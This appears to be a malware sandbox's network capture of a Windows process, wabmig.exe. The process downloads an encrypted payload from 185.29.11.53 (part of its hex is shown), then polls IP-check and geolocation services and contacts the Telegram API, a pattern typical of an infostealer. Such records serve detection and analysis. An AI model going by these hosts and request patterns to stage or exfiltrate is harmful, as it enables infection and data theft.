                                                            Sep 25, 2024 16:01:27.711285114 CEST192.168.2.81.1.1.10xffc4Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 16:01:29.267692089 CEST192.168.2.81.1.1.10x9f1cStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                            Sep 25, 2024 16:01:40.563646078 CEST192.168.2.81.1.1.10x6d3dStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Sep 25, 2024 16:01:27.718611002 CEST1.1.1.1192.168.2.80xffc4No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                            Sep 25, 2024 16:01:27.718611002 CEST1.1.1.1192.168.2.80xffc4No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 16:01:27.718611002 CEST1.1.1.1192.168.2.80xffc4No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 16:01:27.718611002 CEST1.1.1.1192.168.2.80xffc4No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 16:01:27.718611002 CEST1.1.1.1192.168.2.80xffc4No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 16:01:27.718611002 CEST1.1.1.1192.168.2.80xffc4No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 16:01:29.278820992 CEST1.1.1.1192.168.2.80x9f1cNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 16:01:29.278820992 CEST1.1.1.1192.168.2.80x9f1cNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 16:01:40.788978100 CEST1.1.1.1192.168.2.80x6d3dNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • reallyfreegeoip.org
                                                            • api.telegram.org
                                                            • 185.29.11.53
                                                            • checkip.dyndns.org

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.849710185.29.11.53808168C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 25, 2024 16:01:26.363347054 CEST171OUTGET /fhSIfglR68.bin HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Host: 185.29.11.53
                                                            Cache-Control: no-cache
                                                            Sep 25, 2024 16:01:26.987665892 CEST1236INHTTP/1.1 200 OK
                                                            Content-Type: application/octet-stream
                                                            Last-Modified: Tue, 24 Sep 2024 22:05:30 GMT
                                                            Accept-Ranges: bytes
                                                            ETag: "6878b9decdedb1:0"
                                                            Server: Microsoft-IIS/8.5
                                                            Date: Wed, 25 Sep 2024 14:01:24 GMT
                                                            Content-Length: 274496
                                                            Data Raw: 1e e9 ab 57 fa bc 73 74 a0 db 59 1a a5 fa 24 ba 71 39 a0 4b b2 de 87 a3 e7 46 89 24 f7 2b 05 14 be 49 e5 32 b8 be a7 1e 5a 8b 79 0a 64 23 77 af 19 f9 26 5e cb 05 0a 97 b2 41 78 9d 2d b5 58 fb fe 0e 7f 3b 1d c3 8b ee 44 46 79 99 df e6 17 2b 9f 64 11 4b c9 9c fc fe e0 84 ec 3e 30 26 09 02 a5 48 f3 a5 7a 62 e0 bf 25 66 a3 de 64 05 82 4f d0 99 28 42 39 1b 5a 56 29 21 57 bc 1e 41 89 9f b7 5a 31 3d c8 57 39 7f 02 93 07 99 c4 e0 59 81 63 4d 36 c8 8d a4 30 9a 78 92 13 fe 08 4b a9 d9 f6 a8 a2 38 00 18 28 a6 d1 6c 4a cd db 19 e8 ca 1d de 53 aa 02 5e 7f 38 a5 88 d1 b3 7c 26 52 7d 4b b7 56 e6 0f 94 c0 2c 52 4d 15 f9 19 de c4 94 e5 d5 f1 66 0d 8e 7f 4b 68 fc b8 c7 46 7c 75 05 c6 73 e2 29 f7 e4 29 21 50 63 43 4b 22 b3 be e1 b4 9e 75 71 55 6b 87 c7 4e 79 1d 3c 04 f7 0b ad 1a e5 af 5e 7a 47 9f 10 15 f4 a3 99 c5 9e 2a b6 e3 7a 6d b1 09 81 8a 17 9c 58 29 07 0b dd 39 f7 54 71 1f 0b ca 57 ca 0f c4 28 75 58 84 33 82 76 1d 10 20 e3 28 3a 73 5e 82 30 b4 fa 3f 7c 3a b1 a1 6b 55 7e e2 ea 04 47 4d a4 41 19 ab aa 0c b6 9e 2b [TRUNCATED]
                                                            Data Ascii: WstY$q9KF$+I2Zyd#w&^Ax-X;DFy+dK>0&Hzb%fdO(B9ZV)!WAZ1=W9YcM60xK8(lJS^8|&R}KV,RMfKhF|us))!PcCK"uqUkNy<^zG*zmX)9TqW(uX3v (:s^0?|:kU~GMA+*KTw3\Bu6V:\pj|lS" lYt)S* YCQCbX8908ol3(E-j]r)1EMA)mUulu+p@^t"bl#Iik2%\ygIJp^;znj+Pl}L!ssi),G)D_`F,H>k)nrt"=PRz*a@k~l<$fTAD`%Ebw)"#@P4~$N3CqAiM9*i-DQ<II39,H="iM)pguhSY*WL>eU.>v :6Xutd4WLH}u#Bgc,L5JnFxvc#|H+!rT5v\Cl>{"34OU3w&+u; %TS>#:N!{~bdj5oUlF7lcqNI Q
                                                            Sep 25, 2024 16:01:26.987684011 CEST224INData Raw: d6 a4 ee 7a 25 59 f8 34 da 66 7b 1e 1f 27 01 df fb 1e 55 57 6e d4 41 66 c9 15 f8 0e 53 70 8b ed 03 cf 24 37 33 63 fc 27 8d 20 55 93 39 09 bc f7 2b 06 32 10 98 33 20 68 4b 83 4a 6a d4 79 e1 36 9b 93 7a af af 79 8d 09 eb d2 85 bb 89 5c 48 b3 a1 cc
                                                            Data Ascii: z%Y4f{'UWnAfSp$73c' U9+23 hKJjy6zy\H]O~MUYVP'9}g[by>/0iY'?'6f35aH|Gc,PV.xvM[oB@mu_>{,<-K>w
                                                            Sep 25, 2024 16:01:26.987695932 CEST1236INData Raw: 36 69 a2 63 be da f3 39 19 9a bb 7f e6 e7 61 45 1f 62 7f 57 31 e4 b5 8f cd 47 5f 01 1f a3 49 e0 2c bb 3c d3 0b 43 a2 99 46 70 96 45 d1 a3 8d ce 98 c7 38 11 9c 88 ad 8e 7b 98 b2 59 03 48 b3 f2 ee 46 af 31 e8 dd 5b d4 35 53 08 50 ec db 9b 0e 5a 0d
                                                            Data Ascii: 6ic9aEbW1G_I,<CFpE8{YHF1[5SPZ9="2+C(ML;ecJ`fXC2M|i)'DF}DcE4[T}5rB$00>[amHr)=*bHjU[*x@Q5rb@mE,SXf
                                                            Sep 25, 2024 16:01:26.987709999 CEST1236INData Raw: cc 4a 5c 3c fe c7 24 c4 9a 06 0e 30 58 33 43 75 0b 42 f0 b7 e5 5e d9 38 0f 62 b3 2d d2 4a f7 51 f6 af 42 40 76 49 16 39 94 d2 ac bc cb d4 e1 38 5e 43 b0 90 c0 32 ff bd c0 8b 5c 63 7c 4d bf df 4b 29 ea 5a 19 66 58 fa 4d 50 02 8c 0b 58 8f f9 7b f1
                                                            Data Ascii: J\<$0X3CuB^8b-JQB@vI98^C2\c|MK)ZfXMPX{SU_~rCZYt4;.M_R/gc_FjmSXxlVdOg#xh^vmJfr:y:($(%7!&O&Y3}
                                                            Sep 25, 2024 16:01:26.987735987 CEST448INData Raw: c1 39 e9 0a 3e 06 b8 ff da 43 16 1f 99 33 9d 6f 56 97 b6 82 82 ca 23 2b 6a 5d cc fa 02 08 ea 98 50 d4 bb 70 b1 3d cd ac 58 72 32 85 f6 da b3 7c 22 59 7a 37 f5 51 e0 2c c7 c3 2c 81 e2 96 af 1b de f0 94 e5 d5 e1 66 ed 9f 69 b4 65 9f e8 c7 40 15 21
                                                            Data Ascii: 9>C3oV#+j]Pp=Xr2|"Yz7Q,,fie@!mW)%\kL%{sgJ'<2Xex8))rT{4A.#}c <6{r8n|:T>/EE/&'M;%u;["E6V.v<S(`
                                                            Sep 25, 2024 16:01:26.987749100 CEST1236INData Raw: a2 1b 44 0a a4 cc f0 bb 10 5a 3e 1b d0 60 8b af d3 0a cd e1 64 70 fe c6 e8 9b a4 03 b1 d2 22 de 3d f6 80 9a 9d f3 ae 54 3a 7a ce 2c f8 c6 bf b3 c0 6b 60 e9 c2 40 9c 60 e3 99 79 6b fe 53 b4 db e8 15 26 65 a6 4d 5b 91 15 19 28 87 23 30 43 4c df d2
                                                            Data Ascii: DZ>`dp"=T:z,k`@`ykS&eM[(#0CL#*X`y9@d4~4VCqGGi)CVSvI1?9^L:"ivgb)puxMJrllM!8Yyr&Ztgp3vx\iX#ac&
                                                            Sep 25, 2024 16:01:26.987760067 CEST224INData Raw: ce 41 2c 07 fc 29 29 47 a9 4c 98 64 94 6b b3 24 c7 68 1e c3 81 fd 46 54 7f b1 74 19 17 21 34 63 03 4c bb cd fb fe d0 ac b9 3e 30 2c 21 4b a5 48 f9 a9 7c 0d 90 bf 25 6c d1 4c 6e 05 f2 3d 8f 9e 28 32 31 33 13 56 29 2b 38 cd 9e 41 83 9f bc 48 f9 9f
                                                            Data Ascii: A,))GLdk$hFTt!4cL>0,!KH|%lLn=(213V)+8AH@(]O*Y&/5z2(!'5UR}f,/f}KsFgqSgl(:>^G"`qUNSNd6^pT9
                                                            Sep 25, 2024 16:01:27.068506002 CEST1236INData Raw: 1b e0 0e 83 fa 3f c9 58 29 0d 21 94 79 72 5e 7a 09 64 ba 47 ca 05 b6 ba 6f 58 f4 51 dd 71 1d 60 27 cb 71 3a 73 54 ed 41 b4 fa 35 7c 3c de db 53 51 74 b3 85 70 47 4d ee 49 6b 10 b0 0c c6 84 a6 29 d7 0b 10 ea 5d 53 d5 80 1a 7c 91 79 93 ad 80 b7 dc
                                                            Data Ascii: ?X)!yr^zdGoXQq`'q:sTA5|<SQtpGMIk)]S|y*6P33,jxj!wSlYS '2YSQCxW8"8qoBGqVbDN+]p/RUy"m%upXH\TblTIck
                                                            Sep 25, 2024 16:01:27.068525076 CEST1236INData Raw: ec c8 c3 53 f9 88 dd 5d 06 00 ed 1f e6 21 4a ce 50 56 33 67 fa 11 74 02 99 2b ae 7e 3a 0b dd 78 b5 6b 7b 5b 27 88 15 c1 b4 5f 00 a4 b0 cf 5c 7b 5e 42 df ff ff d8 61 c5 6e a5 03 0e 26 52 71 6b 6d 2b e0 d6 27 43 9f 4b de a7 52 89 3f 76 ff c8 21 fe
                                                            Data Ascii: S]!JPV3gt+~:xk{['_\{^Ban&Rqkm+'CKR?v!wsq6KqRv=SoxkqS?e{.$9p]p('ogjoNVN,i}_<}eYaBE@e"#StxJeNx
                                                            Sep 25, 2024 16:01:27.068536997 CEST1236INData Raw: 6f 8f 38 f3 e7 01 b0 40 19 f5 aa 46 41 0d 86 9d 86 7b fa 7f 2b 02 75 42 d6 a4 ea 50 25 c0 6e 4a dc 23 7b 1a 35 3c 1b f7 85 c3 55 57 6a e2 41 4c fa 6b ee 7d f4 74 a0 e7 22 9f 50 2e 33 13 d0 5a 8d 0a 71 c5 6a 09 bc f9 0c 01 0c 7c d6 bd 38 18 5c 0a
                                                            Data Ascii: o8@FA{+uBP%nJ#{5<UWjALk}t"P.3Zqj|8\clR'$_(f&yTTN[s[B^#ko}:?10Ti)ixPG(=hBi`TEiC(^y]E(B@yUw{(qOK
                                                            Sep 25, 2024 16:01:27.068550110 CEST1236INData Raw: 3f 87 48 28 2d 74 85 ad 42 47 9f 6b 54 a6 a9 98 6d a2 85 2b 30 43 28 45 f3 b5 75 6a 5d 7a 24 39 b3 cb f4 c0 a3 f4 0b 41 23 6d 55 bf 47 b7 a5 15 c6 0d cc 7b 9d 88 63 b5 7d 79 b3 89 eb 6b 9c 70 90 56 31 d0 22 c5 9e a3 c7 d2 62 d1 f4 40 97 32 4d db
                                                            Data Ascii: ?H(-tBGkTm+0C(Euj]z$9A#mUG{c}ykpV1"b@2Mhkv~\sxI*)v^\d=+xxl5 uuiWG)0_Et\UoI>p4Qc=X,z.(Jzl6 sM[k =+D{%E


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.849711132.226.247.73808168C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 25, 2024 16:01:27.731781960 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Sep 25, 2024 16:01:28.417197943 CEST320INHTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:28 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: b2513a4bf69c17faf22f4cb5f2860e5b
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                            Sep 25, 2024 16:01:28.421348095 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Sep 25, 2024 16:01:28.630296946 CEST320INHTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:28 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 650357a3cad0b1994a0ae76f0efb1a15
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                            Sep 25, 2024 16:01:30.134605885 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Sep 25, 2024 16:01:30.343353987 CEST320INHTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:30 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: a8b520a92002acb76511a9f66e3652ff
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.849716132.226.247.73808168C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 25, 2024 16:01:30.964415073 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Sep 25, 2024 16:01:31.637789011 CEST320INHTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:31 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: a873d5ab400faaeaf2ac363278533284
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.849718132.226.247.73808168C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 25, 2024 16:01:32.265062094 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Sep 25, 2024 16:01:32.957473040 CEST320INHTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:32 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: c4204c702abfa5c6d17b17f593826339
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.849720132.226.247.73808168C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 25, 2024 16:01:33.570441961 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Sep 25, 2024 16:01:34.244263887 CEST320INHTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:34 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: a764a474e7952ae8ca0e9ace70cbbe8f
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.849722132.226.247.73808168C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 25, 2024 16:01:34.887885094 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Sep 25, 2024 16:01:35.553495884 CEST320INHTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:35 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 2ebb95560ef15a9869f1c53f93bc4107
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.849724132.226.247.73808168C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 25, 2024 16:01:36.186857939 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Sep 25, 2024 16:01:37.094461918 CEST320INHTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:36 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 140234859258a3b0ca1add1a5d2819e0
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                            Sep 25, 2024 16:01:37.095856905 CEST320INHTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:36 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 140234859258a3b0ca1add1a5d2819e0
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.849726132.226.247.73808168C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 25, 2024 16:01:37.716640949 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Sep 25, 2024 16:01:38.425971031 CEST320INHTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:38 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: b3f6a0b356e436c17f38f2ccf498ab74
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.849728132.226.247.73808168C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 25, 2024 16:01:39.236999989 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Sep 25, 2024 16:01:39.903758049 CEST320INHTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:39 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 2a60e6a89f4f2fd33a061d0423d79e01
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.849713188.114.97.34438168C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-25 14:01:29 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-09-25 14:01:30 UTC684INHTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:29 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 24948
                                                            Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dz8K5Rytq1OICm4sSwoUt8KnrLoUiWG8ht%2B9wBtYgzN%2F2KQ%2F6CrkBK340KPm2CLzCubyX6xJjDIdcMD8NfgQWsrK%2BMsDspPzLcwIXLLk4hsF%2BAlh46nP0JQ%2Bj0VSD1hbpNAo6r%2FZ"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8c8b8be9dceb8ca7-EWR
